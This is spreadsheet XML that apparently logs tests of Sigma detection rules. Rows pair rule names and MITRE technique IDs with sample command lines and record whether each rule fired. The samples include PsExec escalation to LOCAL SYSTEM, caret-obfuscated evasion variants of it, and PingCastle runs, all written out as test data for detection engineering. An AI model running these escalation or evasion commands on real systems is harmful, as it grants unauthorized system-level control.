      <c r="H17" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="41" t="n"/>
      <c r="J17" s="41" t="n"/>
      <c r="K17" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18" s="42">
      <c r="A18" s="41" t="inlineStr">
        <is>
          <t>t1595</t>
        </is>
      </c>
      <c r="B18" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_pingcastle_script_parent</t>
        </is>
      </c>
      <c r="C18" s="41" t="inlineStr">
        <is>
          <t>PUA - PingCastle Execution From Potentially Suspicious Parent</t>
        </is>
      </c>
      <c r="D18" s="41" t="inlineStr">
        <is>
          <t>b37998de-a70b-4f33-b219-ec36bf433dc0</t>
        </is>
      </c>
      <c r="E18" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\PingCastle.exe --healthcheck --level=Full</t>
        </is>
      </c>
      <c r="F18" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G18" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H18" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="41" t="inlineStr">
        <is>
          <t>PUA - PingCastle Execution (b1cb4ab6-ac31-43f4-adf1-d9d08957419c)</t>
        </is>
      </c>
      <c r="J18" s="41" t="n"/>
      <c r="K18" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" s="42">
      <c r="A19" s="41" t="inlineStr">
        <is>
          <t>t1595</t>
        </is>
      </c>
      <c r="B19" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_pingcastle_script_parent</t>
        </is>
      </c>
      <c r="C19" s="41" t="inlineStr">
        <is>
          <t>PUA - PingCastle Execution From Potentially Suspicious Parent</t>
        </is>
      </c>
      <c r="D19" s="41" t="inlineStr">
        <is>
          <t>b37998de-a70b-4f33-b219-ec36bf433dc0</t>
        </is>
      </c>
      <c r="E19" s="41" t="inlineStr">
        <is>
          <t>"C:\Tools\PingCastle.exe" --healthcheck --level Full</t>
        </is>
      </c>
      <c r="F19" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G19" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="41" t="n"/>
      <c r="J19" s="41" t="n"/>
      <c r="K19" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" s="42">
      <c r="A20" s="41" t="inlineStr">
        <is>
          <t>t1595</t>
        </is>
      </c>
      <c r="B20" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_pingcastle_script_parent</t>
        </is>
      </c>
      <c r="C20" s="41" t="inlineStr">
        <is>
          <t>PUA - PingCastle Execution From Potentially Suspicious Parent</t>
        </is>
      </c>
      <c r="D20" s="41" t="inlineStr">
        <is>
          <t>b37998de-a70b-4f33-b219-ec36bf433dc0</t>
        </is>
      </c>
      <c r="E20" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\PingCastle.exe --healthcheck --level Full --no-enum-limit</t>
        </is>
      </c>
      <c r="F20" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G20" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H20" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="41" t="inlineStr">
        <is>
          <t>Renamed PingCastle Binary Execution (2433a154-bb3d-42e4-86c3-a26bdac91c45); PUA - PingCastle Execution (b1cb4ab6-ac31-43f4-adf1-d9d08957419c); PUA - PingCastle Execution (b1cb4ab6-ac31-43f4-adf1-d9d08957419c)</t>
        </is>
      </c>
      <c r="J20" s="41" t="n"/>
      <c r="K20" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" s="42">
      <c r="A21" s="41" t="inlineStr">
        <is>
          <t>t1595</t>
        </is>
      </c>
      <c r="B21" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_pingcastle_script_parent</t>
        </is>
      </c>
      <c r="C21" s="41" t="inlineStr">
        <is>
          <t>PUA - PingCastle Execution From Potentially Suspicious Parent</t>
        </is>
      </c>
      <c r="D21" s="41" t="inlineStr">
        <is>
          <t>b37998de-a70b-4f33-b219-ec36bf433dc0</t>
        </is>
      </c>
      <c r="E21" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\PingCastle.exe --healthcheck --server --level Full</t>
        </is>
      </c>
      <c r="F21" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G21" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H21" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="41" t="inlineStr">
        <is>
          <t>Renamed PingCastle Binary Execution (2433a154-bb3d-42e4-86c3-a26bdac91c45); PUA - PingCastle Execution (b1cb4ab6-ac31-43f4-adf1-d9d08957419c); PUA - PingCastle Execution (b1cb4ab6-ac31-43f4-adf1-d9d08957419c)</t>
        </is>
      </c>
      <c r="J21" s="41" t="n"/>
      <c r="K21" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" s="42">
      <c r="A22" s="34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</row>
    <row r="23" s="42">
      <c r="A23" s="34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</row>
    <row r="24" s="42">
      <c r="A24" s="34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</row>
    <row r="25" s="42">
      <c r="A25" s="34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</row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A27" s="34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</row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A29" s="34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</row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="34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</row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A32" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A33" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A34" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A35" s="34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15.75" customHeight="1" s="42">
      <c r="A36" s="34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</row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="34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</row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="34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</row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="34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</row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="34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</row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A42" s="34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</row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A44" s="34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</row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="34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</row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A47" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A49" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A50" s="34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15.75" customHeight="1" s="42">
      <c r="A51" s="34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</row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="34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</row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="34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</row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="34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</row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="34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</row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="34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 ht="15.75" customHeight="1" s="42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</row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A59" s="34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</row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="34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</row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A62" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A63" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A64" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A65" s="34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15.75" customHeight="1" s="42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</row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="34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</row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="34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</row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="34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</row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="34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</row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A72" s="34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</row>
    <row r="73" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A74" s="34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</row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="34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</row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A77" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A78" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A80" s="34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15.75" customHeight="1" s="42">
      <c r="A81" s="34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</row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="34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</row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="34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</row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="34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</row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="34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</row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A87" s="34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</row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A89" s="34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</row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="34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</row>
    <row r="91" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A92" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A93" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A94" s="34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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42">
      <c r="A96" s="34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</row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="34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</row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="34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</row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="34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</row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="34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</row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A102" s="34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</row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A104" s="34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</row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="34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</row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A108" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A110" s="34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15.75" customHeight="1" s="42">
      <c r="A111" s="34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</row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="34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</row>
    <row r="113" ht="15.75" customHeight="1" s="42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</row>
    <row r="114" ht="15.75" customHeight="1" s="42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</row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="34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</row>
    <row r="116" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="118" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="120" ht="15.75" customHeight="1" s="42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</row>
    <row r="121" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A125" s="34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15.75" customHeight="1" s="42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</row>
    <row r="127" ht="15.75" customHeight="1" s="42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</row>
    <row r="128" ht="15.75" customHeight="1" s="42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</row>
    <row r="129" ht="15.75" customHeight="1" s="42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</row>
    <row r="130" ht="15.75" customHeight="1" s="42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</row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="34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 ht="15.75" customHeight="1" s="42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</row>
    <row r="133" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="135" ht="15.75" customHeight="1" s="42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</row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A140" s="34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15.75" customHeight="1" s="42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</row>
    <row r="142" ht="15.75" customHeight="1" s="42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</row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="34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</row>
    <row r="144" ht="15.75" customHeight="1" s="42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</row>
    <row r="145" ht="15.75" customHeight="1" s="42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</row>
    <row r="146" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="34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 ht="15.75" customHeight="1" s="42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</row>
    <row r="150" ht="15.75" customHeight="1" s="42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</row>
    <row r="151" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A152" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="157" ht="15.75" customHeight="1" s="42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</row>
    <row r="158" ht="15.75" customHeight="1" s="42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</row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="34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</row>
    <row r="160" ht="15.75" customHeight="1" s="42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</row>
    <row r="161" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A162" s="34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</row>
    <row r="163" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="165" ht="15.75" customHeight="1" s="42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</row>
    <row r="166" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="172" ht="15.75" customHeight="1" s="42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</row>
    <row r="173" ht="15.75" customHeight="1" s="42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</row>
    <row r="174" ht="15.75" customHeight="1" s="42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</row>
    <row r="175" ht="15.75" customHeight="1" s="42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</row>
    <row r="176" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="178" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="180" ht="15.75" customHeight="1" s="42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</row>
    <row r="181" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="187" ht="15.75" customHeight="1" s="42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</row>
    <row r="188" ht="15.75" customHeight="1" s="42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</row>
    <row r="189" ht="15.75" customHeight="1" s="42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</row>
    <row r="190" ht="15.75" customHeight="1" s="42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</row>
    <row r="191" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="193" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="195" ht="15.75" customHeight="1" s="42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</row>
    <row r="196" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="202" ht="15.75" customHeight="1" s="42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</row>
    <row r="203" ht="15.75" customHeight="1" s="42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</row>
    <row r="204" ht="15.75" customHeight="1" s="42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</row>
    <row r="205" ht="15.75" customHeight="1" s="42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</row>
    <row r="206" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="208" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="210" ht="15.75" customHeight="1" s="42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</row>
    <row r="211" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="217" ht="15.75" customHeight="1" s="42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</row>
    <row r="218" ht="15.75" customHeight="1" s="42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</row>
    <row r="219" ht="15.75" customHeight="1" s="42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</row>
    <row r="220" ht="15.75" customHeight="1" s="42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</row>
    <row r="221" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="223" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="225" ht="15.75" customHeight="1" s="42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</row>
    <row r="226" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="232" ht="15.75" customHeight="1" s="42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</row>
    <row r="233" ht="15.75" customHeight="1" s="42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</row>
    <row r="961" ht="15.75" customHeight="1" s="42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</row>
    <row r="962" ht="15.75" customHeight="1" s="42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</row>
    <row r="963" ht="15.75" customHeight="1" s="42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</row>
    <row r="964" ht="15.75" customHeight="1" s="42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</row>
    <row r="965" ht="15.75" customHeight="1" s="42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</row>
    <row r="966" ht="15.75" customHeight="1" s="42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</row>
    <row r="967" ht="15.75" customHeight="1" s="42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</row>
    <row r="968" ht="15.75" customHeight="1" s="42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</row>
    <row r="969" ht="15.75" customHeight="1" s="42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</row>
    <row r="970" ht="15.75" customHeight="1" s="42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</row>
    <row r="971" ht="15.75" customHeight="1" s="42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</row>
    <row r="972" ht="15.75" customHeight="1" s="42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</row>
    <row r="973" ht="15.75" customHeight="1" s="42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</row>
    <row r="974" ht="15.75" customHeight="1" s="42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</row>
    <row r="975" ht="15.75" customHeight="1" s="42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</row>
    <row r="976" ht="15.75" customHeight="1" s="42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</row>
    <row r="977" ht="15.75" customHeight="1" s="42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</row>
    <row r="978" ht="15.75" customHeight="1" s="42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</row>
    <row r="979" ht="15.75" customHeight="1" s="42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</row>
    <row r="980" ht="15.75" customHeight="1" s="42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</row>
    <row r="981" ht="15.75" customHeight="1" s="42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</row>
    <row r="982" ht="15.75" customHeight="1" s="42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</row>
    <row r="983" ht="15.75" customHeight="1" s="42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</row>
    <row r="984" ht="15.75" customHeight="1" s="42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</row>
    <row r="985" ht="15.75" customHeight="1" s="42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</row>
    <row r="986" ht="15.75" customHeight="1" s="42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</row>
    <row r="987" ht="15.75" customHeight="1" s="42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</row>
    <row r="988" ht="15.75" customHeight="1" s="42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</row>
    <row r="989" ht="15.75" customHeight="1" s="42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</row>
    <row r="990" ht="15.75" customHeight="1" s="42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</row>
    <row r="991" ht="15.75" customHeight="1" s="42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</row>
    <row r="992" ht="15.75" customHeight="1" s="42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</row>
    <row r="993" ht="15.75" customHeight="1" s="42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</row>
    <row r="994" ht="15.75" customHeight="1" s="42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</row>
    <row r="995" ht="15.75" customHeight="1" s="42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</row>
    <row r="996" ht="15.75" customHeight="1" s="42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</row>
    <row r="997" ht="15.75" customHeight="1" s="42"/>
    <row r="998" ht="15.75" customHeight="1" s="42"/>
    <row r="999" ht="15.75" customHeight="1" s="42"/>
    <row r="1000" ht="15.75" customHeight="1" s="42"/>
  </sheetData>
  <autoFilter ref="A1:K996"/>
  <dataValidations count="3">
    <dataValidation sqref="F2:H14" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"TRUE,FALSE"</formula1>
    </dataValidation>
    <dataValidation sqref="J2:J14" showDropDown="1" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="custom">
      <formula1>AND(ISNUMBER(J2),(NOT(OR(NOT(ISERROR(DATEVALUE(J2))), AND(ISNUMBER(J2), LEFT(CELL("format", J2))="D")))))</formula1>
    </dataValidation>
    <dataValidation sqref="A2:A14" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"t1593.003,t1595,execution"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60.43" customWidth="1" style="42" min="2" max="2"/>
    <col width="43" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="69" customWidth="1" style="42" min="5" max="5"/>
    <col width="18" customWidth="1" style="42" min="6" max="7"/>
    <col width="18.57" customWidth="1" style="42" min="8" max="8"/>
    <col width="56" customWidth="1" style="42" min="9" max="9"/>
    <col width="18" customWidth="1" style="42" min="10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3" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B2" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psexec_paexec_escalate_system</t>
        </is>
      </c>
      <c r="C2" s="44" t="inlineStr">
        <is>
          <t>PsExec/PAExec Escalation to LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D2" s="44" t="inlineStr">
        <is>
          <t>8834e2f7-6b4b-4f09-8906-d2276470ee23</t>
        </is>
      </c>
      <c r="E2" s="43" t="inlineStr">
        <is>
          <t>"C:\Users\Public\Temp\PsExec.exe" -i -s "cmd" -accepteula</t>
        </is>
      </c>
      <c r="F2" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3" ht="22.5" customHeight="1" s="42">
      <c r="A3" s="43" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B3" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psexec_paexec_escalate_system</t>
        </is>
      </c>
      <c r="C3" s="44" t="inlineStr">
        <is>
          <t>PsExec/PAExec Escalation to LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D3" s="44" t="inlineStr">
        <is>
          <t>8834e2f7-6b4b-4f09-8906-d2276470ee23</t>
        </is>
      </c>
      <c r="E3" s="43" t="inlineStr">
        <is>
          <t>"C:\Users\Public\Temp\PsExec.exe" -i -s cmd.exe -accepteula</t>
        </is>
      </c>
      <c r="F3" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" s="42">
      <c r="A4" s="43" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B4" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psexec_paexec_escalate_system</t>
        </is>
      </c>
      <c r="C4" s="43" t="inlineStr">
        <is>
          <t>PsExec/PAExec Escalation to LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D4" s="43" t="inlineStr">
        <is>
          <t>8834e2f7-6b4b-4f09-8906-d2276470ee23</t>
        </is>
      </c>
      <c r="E4" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\Users\Public\Temp\PsExec.exe" -i -s^ cmd -accepteula"</t>
        </is>
      </c>
      <c r="F4" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4" s="43" t="n"/>
      <c r="J4" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K4" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="5" ht="22.5" customHeight="1" s="42">
      <c r="A5" s="44" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B5" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psexec_paexec_escalate_system</t>
        </is>
      </c>
      <c r="C5" s="44" t="inlineStr">
        <is>
          <t>PsExec/PAExec Escalation to LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D5" s="44" t="inlineStr">
        <is>
          <t>8834e2f7-6b4b-4f09-8906-d2276470ee23</t>
        </is>
      </c>
      <c r="E5" s="43" t="inlineStr">
        <is>
          <t>"C:\Users\Public\Temp\PsExec.exe" -s -i -d cmd -accepteula</t>
        </is>
      </c>
      <c r="F5" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G5" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H5" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I5" s="43" t="n"/>
      <c r="J5" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K5" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="6" ht="22.5" customHeight="1" s="42">
      <c r="A6" s="43" t="inlineStr">
        <is>
          <t>t1588.002</t>
        </is>
      </c>
      <c r="B6" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_eula_accepted</t>
        </is>
      </c>
      <c r="C6" s="43" t="inlineStr">
        <is>
          <t>Potential Execution of Sysinternals Tools</t>
        </is>
      </c>
      <c r="D6" s="43" t="inlineStr">
        <is>
          <t>7cccd811-7ae9-4ebe-9afd-cb5c406b824b</t>
        </is>
      </c>
      <c r="E6" s="43" t="inlineStr">
        <is>
          <t>"C:\Users\Public\Temp\PsExec.exe" "-accepteula" -i -s cmd</t>
        </is>
      </c>
      <c r="F6" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G6" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H6" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I6" s="43" t="n"/>
      <c r="J6" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K6" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="7" ht="22.5" customHeight="1" s="42">
      <c r="A7" s="43" t="inlineStr">
        <is>
          <t>t1588.002</t>
        </is>
      </c>
      <c r="B7" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_eula_accepted</t>
        </is>
      </c>
      <c r="C7" s="43" t="inlineStr">
        <is>
          <t>Potential Execution of Sysinternals Tools</t>
        </is>
      </c>
      <c r="D7" s="43" t="inlineStr">
        <is>
          <t>7cccd811-7ae9-4ebe-9afd-cb5c406b824b</t>
        </is>
      </c>
      <c r="E7" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Users\Public\Temp\PsExec.exe" -accept^eula -i -s cmd</t>
        </is>
      </c>
      <c r="F7" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G7" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H7" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I7" s="43" t="n"/>
      <c r="J7" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K7" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="8" ht="22.5" customHeight="1" s="42">
      <c r="A8" s="43" t="inlineStr">
        <is>
          <t>t1588.002</t>
        </is>
      </c>
      <c r="B8" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_eula_accepted</t>
        </is>
      </c>
      <c r="C8" s="43" t="inlineStr">
        <is>
          <t>Potential Execution of Sysinternals Tools</t>
        </is>
      </c>
      <c r="D8" s="43" t="inlineStr">
        <is>
          <t>7cccd811-7ae9-4ebe-9afd-cb5c406b824b</t>
        </is>
      </c>
      <c r="E8" s="43" t="inlineStr">
        <is>
          <t>"C:\Users\Public\Temp\PsExec.exe" /accepteula -i -s cmd</t>
        </is>
      </c>
      <c r="F8" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G8" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H8" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I8" s="43" t="n"/>
      <c r="J8" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K8" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="9" ht="22.5" customHeight="1" s="42">
      <c r="A9" s="43" t="inlineStr">
        <is>
          <t>t1588.002</t>
        </is>
      </c>
      <c r="B9" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_eula_accepted</t>
        </is>
      </c>
      <c r="C9" s="43" t="inlineStr">
        <is>
          <t>Potential Execution of Sysinternals Tools</t>
        </is>
      </c>
      <c r="D9" s="43" t="inlineStr">
        <is>
          <t>7cccd811-7ae9-4ebe-9afd-cb5c406b824b</t>
        </is>
      </c>
      <c r="E9" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Diagnostics.Process]::Start('C:\Users\Public\Temp\PsExec.exe', '-accepteula -i -s cmd')"</t>
        </is>
      </c>
      <c r="F9" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G9" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H9" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I9" s="43" t="inlineStr">
        <is>
          <t>PsExec/PAExec Escalation to LOCAL SYSTEM (8834e2f7-6b4b-4f09-8906-d2276470ee23); PsExec/PAExec Escalation to LOCAL SYSTEM (8834e2f7-6b4b-4f09-8906-d2276470ee23)</t>
        </is>
      </c>
      <c r="J9" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K9" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10" ht="22.5" customHeight="1" s="42">
      <c r="A10" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
